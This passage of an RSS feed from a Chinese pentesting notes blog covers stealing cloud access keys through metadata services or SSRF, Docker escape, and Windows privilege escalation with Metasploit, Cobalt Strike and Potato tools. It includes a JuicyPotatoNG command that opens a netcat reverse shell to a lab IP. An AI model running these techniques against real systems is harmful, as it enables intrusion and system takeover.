/&gt;&lt;/p&gt;&#xA;&lt;p&gt;因此接管整个云服务只需获得到aksk即可&lt;/p&gt;&#xA;&lt;p&gt;那么如何获取呢，第一种方法就是寻找代码中有没有泄露aksk。第二种方法是使用实例去访问元数据服务，获取临时凭证。&lt;/p&gt;&#xA;&lt;p&gt;那么第二种方法很显然需要shell，能够执行curl命令，访问元数据。那么还有没有方法可以获取到呢？&lt;/p&gt;&#xA;&lt;p&gt;我们要注意的是这里的请求是http请求，那么联系其他漏洞，是否可以使用ssrf去访问到元数据呢？答案是肯定的，不过需要有回显的ssrf，获取到aksk。再用cf接管整个云服务。&lt;/p&gt;&#xA;&lt;h2 id=&#34;docker&#34;&gt;docker&lt;a class=&#34;anchor&#34; href=&#34;#docker&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;p&gt;docker逃逸是个老话题，之前没有系统学习，学得都比较杂，这次整理一下笔记&lt;/p&gt;&#xA;&lt;p&gt;逃逸不过三种方法，但是需要注意的是，除了linux内核逃逸，其他都需要root权限&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;特权模式&lt;/li&gt;&#xA;&lt;li&gt;危险挂载&lt;/li&gt;&#xA;&lt;li&gt;docker自身组件漏洞或linux内核漏洞&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h3 id=&#34;特权模式&#34;&gt;特权模式&lt;a class=&#34;anchor&#34; href=&#34;#%e7%89%b9%e6%9d%83%e6%a8%a1%e5%bc%8f&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;h4 id=&#34;linux-capabilities介绍&#34;&gt;Linux Capabilities介绍&lt;a class=&#34;anchor&#34; href=&#34;#linux-capabilities%e4%bb%8b%e7%bb%8d&#34;&gt;#&lt;/a&gt;&lt;/h4&gt;&#xA;&lt;p&gt;Linux 是一种安全的操作系统，它把所有的系统权限都赋予了一个单一的 root 用户，只给普通用户保留有限的权限。root 用户拥有超级管理员权限，可以安装软件、允许某些服务、管理用户等。&lt;/p&gt;&#xA;&lt;p&gt;作为普通用户，如果想执行某些只有管理员才有权限的操作，以前只有两种办法：一是通过 &lt;code&gt;sudo&lt;/code&gt; 提升权限，如果用户很多，配置管理和权限控制会很麻烦；二是通过 SUID（Set User ID on execution）来实现，它可以让普通用户允许一个 &lt;code&gt;owner&lt;/code&gt; 为 root 的可执行文件时具有 root 的权限。&lt;/p&gt;</description>
			</item>
			<item>
				<title></title>
				<link>https://kiiy.cn/docs/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://kiiy.cn/docs/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/</guid>
				<description>&lt;h1 id=&#34;权限提升&#34;&gt;权限提升&lt;a class=&#34;anchor&#34; href=&#34;#%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87&#34;&gt;#&lt;/a&gt;&lt;/h1&gt;&#xA;&lt;h2 id=&#34;windows&#34;&gt;windows&lt;a class=&#34;anchor&#34; href=&#34;#windows&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;h3 id=&#34;msf提权模块&#34;&gt;msf提权模块&lt;a class=&#34;anchor&#34; href=&#34;#msf%e6%8f%90%e6%9d%83%e6%a8%a1%e5%9d%97&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;环境：windows2008 r2 + iis + asp&lt;/p&gt;&#xA;&lt;p&gt;使用哥斯拉连接，whoami查看用户为iis用户，权限较小&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250504160759989.png&#34; alt=&#34;image-20250504160759989&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;上线msf&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250504193422236.png&#34; alt=&#34;image-20250504193422236&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;使用multi/recon/local_exploit_suggester提权模块&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250505122038686.png&#34; alt=&#34;image-20250505122038686&#34; /&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;cs插件提权&#34;&gt;cs插件提权&lt;a class=&#34;anchor&#34; href=&#34;#cs%e6%8f%92%e4%bb%b6%e6%8f%90%e6%9d%83&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;首先上线cs，这里不赘述&lt;/p&gt;&#xA;&lt;p&gt;使用LSTAR插件，点击左上角cobalt strike，选择脚本管理器，添加脚本，选中.cna文件添加&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250505185850869.png&#34; alt=&#34;image-20250505185850869&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;然后选择烂土豆模块进行提取&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250505190053878.png&#34; alt=&#34;image-20250505190053878&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;执行whoami命令，可以看到为system权限&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250505190123468.png&#34; alt=&#34;image-20250505190123468&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;之后执行cs木马，即可以system用户上线cs&lt;/p&gt;&#xA;&lt;h3 id=&#34;土豆家族&#34;&gt;土豆家族&lt;a class=&#34;anchor&#34; href=&#34;#%e5%9c%9f%e8%b1%86%e5%ae%b6%e6%97%8f&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;这篇文章记录了土豆家族几乎所有的变种&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w&#34;&gt;https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;这里就展示几个复现成功的，有的编译有问题，还有的执行有问题，可能是我的环境问题，winserver 2016&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;BadPotato&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-cmd&#34; data-lang=&#34;cmd&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;BadPotato.exe whoami&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250506154233383.png&#34; alt=&#34;image-20250506154233383&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;EfsPotato&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-cmd&#34; data-lang=&#34;cmd&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;EfsPotato.exe whoami&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250506154322072.png&#34; alt=&#34;image-20250506154322072&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;juicyPotato&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-cmd&#34; data-lang=&#34;cmd&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;JuicyPotatoNG.exe -t * -p C:/aa/nc64.exe -a &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;192.168.239.1 2333 -e c:\windows\system32\cmd.exe&amp;#34;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250506154521471.png&#34; alt=&#34;image-20250506154521471&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;PetitPotato&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-cmd&#34; data-lang=&#34;cmd&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PetitPotato.exe &amp;lt;0-12&amp;gt; whoami&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250506154751542.png&#34; alt=&#34;image-20250506154751542&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;PrintNotifyPotato&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-cmd&#34; data-lang=&#34;cmd&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PrintNotifyPotato whoami&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250506154939178.png&#34; alt=&#34;image-20250506154939178&#34; /&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;bypass-uac&#34;&gt;bypass UAC&lt;a class=&#34;anchor&#34; href=&#34;#bypass-uac&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;在本地用户管理员组在getsystem提权过程中会出现uac问题&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250508164010164.png&#34; alt=&#34;image-20250508164010164&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;本文记录一些bypass uac的方法&lt;/p&gt;</description>
			</item>
	</channel>
</rss>
